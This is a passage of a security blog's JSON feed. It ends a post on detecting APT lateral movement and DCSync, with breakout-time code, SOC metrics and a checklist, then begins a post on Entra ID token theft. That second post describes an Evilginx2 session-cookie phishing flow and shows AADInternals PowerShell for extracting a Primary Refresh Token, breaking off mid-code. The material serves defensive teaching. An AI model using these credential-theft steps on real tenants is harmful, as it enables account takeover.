class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'host'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">]</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    lateral_events </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token plain\"> incident_events</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">[</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token plain\">incident_events</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">[</span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'host'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">]</span><span class=\"token plain\"> </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">!=</span><span class=\"token plain\"> source_host</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token plain\"> </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">&amp;</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token plain\">incident_events</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">[</span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'event_type'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">]</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token plain\">isin</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">[</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">            </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'lateral_movement'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'pass_the_hash'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">            </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'remote_execution'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'new_beacon'</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">]</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">]</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token plain\">sort_values</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'timestamp'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">if</span><span class=\"token plain\"> lateral_events</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token plain\">empty</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">return</span><span class=\"token plain\"> </span><span class=\"token boolean\" style=\"color:hsl(356, 75%, 47%)\">None</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    t_lateral </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token plain\"> lateral_events</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token plain\">iloc</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">[</span><span class=\"token number\" style=\"color:hsl(212, 92%, 35%)\">0</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">]</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">[</span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'timestamp'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">]</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    breakout_seconds </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token plain\"> </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token plain\">t_lateral </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">-</span><span class=\"token plain\"> t_access</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token plain\">total_seconds</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">return</span><span class=\"token plain\"> </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">{</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'breakout_minutes'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"> breakout_seconds </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">/</span><span class=\"token plain\"> </span><span class=\"token number\" style=\"color:hsl(212, 92%, 35%)\">60</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'source_host'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"> source_host</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'first_lateral_host'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"> lateral_events</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token plain\">iloc</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">[</span><span class=\"token number\" style=\"color:hsl(212, 92%, 35%)\">0</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">]</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">[</span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'host'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">]</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">}</span><br></span></code></pre></div></div>\n<p>After 5–10 incidents you have an internal breakout time distribution  more relevant than industry averages because it reflects your specific environment and attacker targeting patterns.</p>\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"the-three-soc-metrics-that-map-directly-to-this\">The Three SOC Metrics That Map Directly to This<a href=\"https://inferencedefense.com/academy/blog-internal/apt-initial-access-to-domain-dominance-4-hours#the-three-soc-metrics-that-map-directly-to-this\" class=\"hash-link\" aria-label=\"Direct link to The Three SOC Metrics That Map Directly to This\" title=\"Direct link to The Three SOC Metrics That Map Directly to This\" translate=\"no\">​</a></h3>\n<p><strong>1. MTTD for lateral movement precursors</strong></p>\n<p>Not generic malware MTTD  specifically: time from first C2 beacon timestamp to first human acknowledgment of active intrusion. Measure by pulling the earliest related event timestamp in every IR timeline and comparing to the first ticket creation timestamp.</p>\n<p><strong>2. Alert-to-containment gap</strong></p>\n<!-- -->\n<p>Most of the gap is not investigation time  it is <strong>approval time</strong>. Automating containment for specific high-confidence events (confirmed C2 beacon, confirmed LSASS dump, confirmed DCSync) eliminates approval latency for the highest-severity triggers.</p>\n<p><strong>3. Detection checkpoint coverage rate</strong></p>\n<p>Of the three checkpoints above, what percentage of test intrusions trigger at least one alert at each? Run quarterly using purple team exercises or Atomic Red Team automation.</p>\n<table><thead><tr><th>Checkpoint</th><th>Target Coverage</th></tr></thead><tbody><tr><td>Checkpoint 3  Credential dumping</td><td>100%</td></tr><tr><td>Checkpoint 2  BloodHound collection</td><td>80%</td></tr><tr><td>Checkpoint 1  C2 beaconing</td><td>60%</td></tr></tbody></table>\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"making-the-investment-case\">Making the Investment Case<a href=\"https://inferencedefense.com/academy/blog-internal/apt-initial-access-to-domain-dominance-4-hours#making-the-investment-case\" class=\"hash-link\" aria-label=\"Direct link to Making the Investment Case\" title=\"Direct link to Making the Investment Case\" translate=\"no\">​</a></h3>\n<div class=\"language-text codeBlockContainer_Ckt0 theme-code-block\" style=\"--prism-color:hsl(212, 13%, 16%);--prism-background-color:hsl(256, 12%, 98%)\"><div class=\"codeBlockContent_QJqH\"><pre tabindex=\"0\" class=\"prism-code language-text codeBlock_bY9V thin-scrollbar\" style=\"color:hsl(212, 13%, 16%);background-color:hsl(256, 12%, 98%)\"><code class=\"codeBlockLines_e6Vv\"><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">Current state:</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">  Median attacker breakout time (internal):    47 minutes</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">  Current alert-to-containment gap:            4.5 hours</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">  Coverage gap:                                −4 hours 13 minutes</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">  Probability of containing before DA access:  ~0%</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">With automated containment for Checkpoint 3 events:</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">  Alert-to-containment gap (automated):        4 minutes</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">  Coverage gap:                                +43 minutes</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">  Probability of containing before DA access:  ~85% (estimated)</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">Investment required:</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">  - SOAR playbook development:     40 hours engineering</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">  - Runbook approval changes:      governance approval</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">  - Quarterly validation:          2 days/quarter</span><br></span></code></pre></div></div>\n<hr>\n<h2 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"summary-the-operational-checklist\">Summary: The Operational Checklist<a href=\"https://inferencedefense.com/academy/blog-internal/apt-initial-access-to-domain-dominance-4-hours#summary-the-operational-checklist\" class=\"hash-link\" aria-label=\"Direct link to Summary: The Operational Checklist\" title=\"Direct link to Summary: The Operational Checklist\" translate=\"no\">​</a></h2>\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"immediate-actions-this-week\">Immediate actions (this week)<a href=\"https://inferencedefense.com/academy/blog-internal/apt-initial-access-to-domain-dominance-4-hours#immediate-actions-this-week\" class=\"hash-link\" aria-label=\"Direct link to Immediate actions (this week)\" title=\"Direct link to Immediate actions (this week)\" translate=\"no\">​</a></h3>\n<ul>\n<li class=\"\">Enable Event ID 1644 LDAP diagnostic logging on all Domain Controllers</li>\n<li class=\"\">Enable <code>Audit Directory Service Access</code> for success events on DCs</li>\n<li class=\"\">Deploy the DCSync Sigma rule  zero false positives in standard environments</li>\n<li class=\"\">Add <code>comsvcs.dll MiniDump</code> process creation detection  no legitimate use case</li>\n</ul>\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"30-day-actions\">30-day actions<a href=\"https://inferencedefense.com/academy/blog-internal/apt-initial-access-to-domain-dominance-4-hours#30-day-actions\" class=\"hash-link\" aria-label=\"Direct link to 30-day actions\" title=\"Direct link to 30-day actions\" translate=\"no\">​</a></h3>\n<ul>\n<li class=\"\">Baseline LDAP query rates per source workstation to enable BloodHound detection</li>\n<li class=\"\">Run BloodHound against your own environment  enumerate every DA path</li>\n<li class=\"\">Identify all Kerberoastable accounts and migrate to gMSA or 30+ char random passwords</li>\n<li class=\"\">Audit <code>msDS-SupportedEncryptionTypes</code>  disable RC4 where possible</li>\n</ul>\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"quarterly\">Quarterly<a href=\"https://inferencedefense.com/academy/blog-internal/apt-initial-access-to-domain-dominance-4-hours#quarterly\" class=\"hash-link\" aria-label=\"Direct link to Quarterly\" title=\"Direct link to Quarterly\" translate=\"no\">​</a></h3>\n<ul>\n<li class=\"\">Run SharpHound in your environment and verify your detection triggers</li>\n<li class=\"\">Execute comsvcs.dll dump against a test host and verify your SIEM alerts</li>\n<li class=\"\">Simulate a DCSync from a non-DC host and verify your 4662 alert fires</li>\n<li class=\"\">Measure your alert-to-containment gap for the last 5 real incidents</li>\n</ul>\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"the-fundamental-shift\">The fundamental shift<a href=\"https://inferencedefense.com/academy/blog-internal/apt-initial-access-to-domain-dominance-4-hours#the-fundamental-shift\" class=\"hash-link\" aria-label=\"Direct link to The fundamental shift\" title=\"Direct link to The fundamental shift\" translate=\"no\">​</a></h3>\n<p>Detection built around human-in-the-loop review cannot keep pace with adversary breakout times under 60 minutes. The architecture that works:</p>\n<blockquote>\n<p><strong>High-fidelity automated detection → automated containment for specific trigger events → human review of containment decision in parallel, not in series.</strong></p>\n</blockquote>\n<p>The three events (DCSync, comsvcs MiniDump, confirmed C2 beacon) have near-zero false positive rates when properly tuned. Automated containment on these events will generate almost no incorrect isolations while dramatically compressing your exposure window.</p>\n<hr>\n<h2 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"references-and-further-reading\">References and Further Reading<a href=\"https://inferencedefense.com/academy/blog-internal/apt-initial-access-to-domain-dominance-4-hours#references-and-further-reading\" class=\"hash-link\" aria-label=\"Direct link to References and Further Reading\" title=\"Direct link to References and Further Reading\" translate=\"no\">​</a></h2>\n<ul>\n<li class=\"\">CrowdStrike 2024 Global Threat Report  breakout time statistics, eCrime methodology</li>\n<li class=\"\">DFIR Report (dfirreport.com)  full intrusion timelines with raw telemetry and IOCs</li>\n<li class=\"\">MITRE ATT&amp;CK T1021.003 (DCOM lateral movement)  documented adversary procedures</li>\n<li class=\"\">Harmj0y BloodHound documentation  ACL abuse paths and enumeration methodology</li>\n<li class=\"\">SysWhispers2/3 GitHub  direct syscall implementation reference</li>\n<li class=\"\">Elastic Security Labs  JARM-based infrastructure detection methodology</li>\n<li class=\"\">Microsoft MSDN  Event ID 4662, 4769, 1644 field documentation</li>\n<li class=\"\">Impacket GitHub  reference implementation of PTH, DCSync, DCOM attack tooling</li>\n</ul>\n<h2 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"further-reading\">Further Reading<a href=\"https://inferencedefense.com/academy/blog-internal/apt-initial-access-to-domain-dominance-4-hours#further-reading\" class=\"hash-link\" aria-label=\"Direct link to Further Reading\" title=\"Direct link to Further Reading\" translate=\"no\">​</a></h2>\n<ul>\n<li class=\"\"><a class=\"\" href=\"https://inferencedefense.com/academy/how-attackers-abuse-entra-id-oauth-without-malware\">How Attackers Abuse Entra ID &amp; OAuth Without Malware</a>  identity-layer attacks that follow the same initial access patterns</li>\n<li class=\"\"><a class=\"\" href=\"https://inferencedefense.com/academy/mfa-bypass-device-code-phishing-token-replay-conditional-access\">MFA Bypass in 2025–2026: Device Code Phishing, Token Replay</a>  how attackers maintain persistence after domain compromise</li>\n<li class=\"\"><a class=\"\" href=\"https://inferencedefense.com/academy/windows-event-log-architecture-siem-missing-events\">Windows Event Log Architecture: Why Your SIEM Is Missing 30% of Events</a>  close the telemetry gaps attackers exploit in this timeline</li>\n<li class=\"\"><a class=\"\" href=\"https://inferencedefense.com/academy/network-forensics-lateral-movement-dns-netflow-auth-logs\">Network Forensics Without a Tap</a>  reconstruct lateral movement when EDR is disabled or unavailable</li>\n</ul>\n<hr>\n<p><em>All commands and code in this post describe attacker techniques documented in public DFIR reports and academic research. They are presented for defensive detection purposes only. Running these techniques against systems you do not own or have explicit written authorization to test is illegal.</em></p>",
            "url": "https://inferencedefense.com/academy/blog-internal/apt-initial-access-to-domain-dominance-4-hours",
            "title": "How APT Groups Pivot from Initial Access to Domain Dominance in Under 4 Hours",
            "summary": "A technical deep-dive into the attacker timeline from initial foothold to Domain Admin  with exact commands, telemetry gaps, and detection rules for SOC teams.",
            "date_modified": "2026-04-17T00:00:00.000Z",
            "author": {
                "name": "Inference Defense",
                "url": "https://inferencedefense.com"
            },
            "tags": [
                "threat-intelligence",
                "active-directory",
                "lateral-movement",
                "detection-engineering",
                "incident-response",
                "cobalt-strike",
                "kerberoasting",
                "dcsync"
            ]
        },
        {
            "id": "https://inferencedefense.com/academy/blog-internal/how-attackers-abuse-entra-id-oauth-without-malware",
            "content_html": "<blockquote>\n<p><strong>Who this is for:</strong> Security analysts who want to understand exact attack mechanics, and CISOs who need to know why their EDR gives them false confidence against this threat class. Every technique here has been observed in real-world intrusions  no theoretical fluff.</p>\n</blockquote>\n<h2 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"the-uncomfortable-truth-about-modern-identity-attacks\">The Uncomfortable Truth About Modern Identity Attacks<a href=\"https://inferencedefense.com/academy/blog-internal/how-attackers-abuse-entra-id-oauth-without-malware#the-uncomfortable-truth-about-modern-identity-attacks\" class=\"hash-link\" aria-label=\"Direct link to The Uncomfortable Truth About Modern Identity Attacks\" title=\"Direct link to The Uncomfortable Truth About Modern Identity Attacks\" translate=\"no\">​</a></h2>\n<p><strong>Your EDR is blind to most of this.</strong></p>\n<p>When a threat actor steals a valid OAuth token and moves laterally through your Microsoft 365 tenant, no malware is dropped, no exploit fires, no suspicious process spawns. The attacker looks exactly like a legitimate user  because to every security control watching for behavior, they are one. They authenticated successfully. They have a valid session. They are inside.</p>\n<p>This is the defining characteristic of the modern identity attack surface: the weapon is authentication itself.</p>\n<p>In the past three years, attacks on Entra ID (formerly Azure Active Directory) and the OAuth 2.0 layer sitting on top of it have become the dominant initial access vector in enterprise intrusions. The 2024 Microsoft breach by Midnight Blizzard, the Cloudflare intrusion, dozens of ransomware campaigns  all of them started not with a zero-day or a malicious attachment, but with an identity-layer compromise that existing controls simply weren't designed to catch.</p>\n<p>This post breaks down exactly how these attacks work, what the attacker sees, what telemetry exists to detect them, and what actionable controls reduce your exposure. We go deep.</p>\n<hr>\n<h2 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"section-1-token-theft-and-session-hijacking--the-attack-your-edr-cannot-see\">Section 1: Token Theft and Session Hijacking  The Attack Your EDR Cannot See<a href=\"https://inferencedefense.com/academy/blog-internal/how-attackers-abuse-entra-id-oauth-without-malware#section-1-token-theft-and-session-hijacking--the-attack-your-edr-cannot-see\" class=\"hash-link\" aria-label=\"Direct link to Section 1: Token Theft and Session Hijacking  The Attack Your EDR Cannot See\" title=\"Direct link to Section 1: Token Theft and Session Hijacking  The Attack Your EDR Cannot See\" translate=\"no\">​</a></h2>\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"what-a-token-actually-is\">What a Token Actually Is<a href=\"https://inferencedefense.com/academy/blog-internal/how-attackers-abuse-entra-id-oauth-without-malware#what-a-token-actually-is\" class=\"hash-link\" aria-label=\"Direct link to What a Token Actually Is\" title=\"Direct link to What a Token Actually Is\" translate=\"no\">​</a></h3>\n<p>Before understanding how tokens get stolen, you need to understand what makes them valuable.</p>\n<p>When a user authenticates to Microsoft 365, Entra ID issues several tokens:</p>\n<ul>\n<li class=\"\"><strong>Access Token</strong>  a short-lived JWT (typically 60–75 minutes) that grants access to a specific resource. It contains the user's identity claims, group memberships, and the application it was issued for.</li>\n<li class=\"\"><strong>Refresh Token</strong>  a longer-lived credential (up to 90 days for persistent browser sessions) that allows obtaining new access tokens without re-authenticating.</li>\n<li class=\"\"><strong>Primary Refresh Token (PRT)</strong>  a device-bound, highly privileged token issued to Entra ID-joined machines. It can generate tokens for any application the user has access to.</li>\n</ul>\n<p>If an attacker obtains a refresh token or PRT, they have persistent access to your environment that survives password resets.</p>\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"how-access-tokens-are-stolen\">How Access Tokens Are Stolen<a href=\"https://inferencedefense.com/academy/blog-internal/how-attackers-abuse-entra-id-oauth-without-malware#how-access-tokens-are-stolen\" class=\"hash-link\" aria-label=\"Direct link to How Access Tokens Are Stolen\" title=\"Direct link to How Access Tokens Are Stolen\" translate=\"no\">​</a></h3>\n<h4 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"browser-theft-via-malicious-extensions-or-xss\">Browser Theft via Malicious Extensions or XSS<a href=\"https://inferencedefense.com/academy/blog-internal/how-attackers-abuse-entra-id-oauth-without-malware#browser-theft-via-malicious-extensions-or-xss\" class=\"hash-link\" aria-label=\"Direct link to Browser Theft via Malicious Extensions or XSS\" title=\"Direct link to Browser Theft via Malicious Extensions or XSS\" translate=\"no\">​</a></h4>\n<p>The most common path. When a user authenticates to Microsoft 365 through a browser, tokens are stored in the browser's IndexedDB or session storage. A malicious Chrome extension with storage permissions can enumerate and exfiltrate all of them silently.</p>\n<p>The attacker doesn't need to crack anything. The token is valid, signed by Microsoft, and completely legitimate.</p>\n<h4 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"adversary-in-the-middle-aitm-phishing\">Adversary-in-the-Middle (AiTM) Phishing<a href=\"https://inferencedefense.com/academy/blog-internal/how-attackers-abuse-entra-id-oauth-without-malware#adversary-in-the-middle-aitm-phishing\" class=\"hash-link\" aria-label=\"Direct link to Adversary-in-the-Middle (AiTM) Phishing\" title=\"Direct link to Adversary-in-the-Middle (AiTM) Phishing\" translate=\"no\">​</a></h4>\n<p>Tools like Evilginx2 and Muraena act as reverse proxies between the victim and the legitimate Microsoft login page. The victim sees the real Microsoft login UI, completes MFA, and the proxy captures the post-authentication session cookie.</p>\n<div class=\"language-bash codeBlockContainer_Ckt0 theme-code-block\" style=\"--prism-color:hsl(212, 13%, 16%);--prism-background-color:hsl(256, 12%, 98%)\"><div class=\"codeBlockContent_QJqH\"><pre tabindex=\"0\" class=\"prism-code language-bash codeBlock_bY9V thin-scrollbar\" style=\"color:hsl(212, 13%, 16%);background-color:hsl(256, 12%, 98%)\"><code class=\"codeBlockLines_e6Vv\"><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\"># Evilginx2 phishlet targeting Microsoft 365 (simplified flow)</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\"># Attacker hosts reverse proxy at attacker-controlled domain</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\"># Victim visits: login.attacker-domain.com</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\"># Proxy forwards to: login.microsoftonline.com</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\"># Victim authenticates, completes MFA</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\"># Evilginx captures the session cookie (estsauth, estsauthpersistent)</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\"># Attacker imports cookie:</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\"># 1. Opens Chrome DevTools</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\"># 2. Imports captured cookie into browser storage</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\"># 3. Visits portal.office.com  authenticated as victim, no MFA prompted</span><br></span></code></pre></div></div>\n<p>This is why MFA alone is not sufficient protection. The attacker is not bypassing MFA  they're stealing the result of a completed MFA flow.</p>\n<h4 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"prt-theft-from-entra-id-joined-devices\">PRT Theft from Entra ID-Joined Devices<a href=\"https://inferencedefense.com/academy/blog-internal/how-attackers-abuse-entra-id-oauth-without-malware#prt-theft-from-entra-id-joined-devices\" class=\"hash-link\" aria-label=\"Direct link to PRT Theft from Entra ID-Joined Devices\" title=\"Direct link to PRT Theft from Entra ID-Joined Devices\" translate=\"no\">​</a></h4>\n<p>The Primary Refresh Token lives in the Windows LSASS process on domain-joined machines. An attacker with local admin can use tools like ROADtoken or AADInternals to extract and use it.</p>\n<div class=\"language-powershell codeBlockContainer_Ckt0 theme-code-block\" style=\"--prism-color:hsl(212, 13%, 16%);--prism-background-color:hsl(256, 12%, 98%)\"><div class=\"codeBlockContent_QJqH\"><pre tabindex=\"0\" class=\"prism-code language-powershell codeBlock_bY9V thin-scrollbar\" style=\"color:hsl(212, 13%, 16%);background-color:hsl(256, 12%, 98%)\"><code class=\"codeBlockLines_e6Vv\"><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"># Using AADInternals to extract PRT from a joined device (requires local admin)</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">Import-Module AADInternals</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"># Extract PRT and session key from LSASS</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">$prt = Get-AADIntUserPRTToken</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" 